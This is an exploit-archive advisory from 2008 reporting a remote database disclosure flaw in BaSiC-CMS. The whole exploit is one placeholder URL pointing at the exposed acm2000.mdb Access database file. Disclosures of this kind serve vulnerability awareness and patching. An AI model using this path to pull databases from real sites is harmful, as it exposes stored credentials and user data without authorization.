id: 4285
date: 11/28/2008
title: BaSiC-CMS (acm2000.mdb) Remote Database Disclosure Vulnerability
author: Stack
cves: 

================================================================
BaSiC-CMS (acm2000.mdb) Remote Database Disclosure Vulnerability
================================================================


#########################################################
---------------------------------------------------------
Portal Name: Basic-cms (ASP)
D0wn : http://www.basic-cms.com/download-basiccms.zip
Author : Mountassif Moad
Vulnerability : Database Disclosure Vulnerability
---------------------------------------------------------
#########################################################
http://www.site.com/acm2000.mdb



#  0day.today [2023-03-21]  #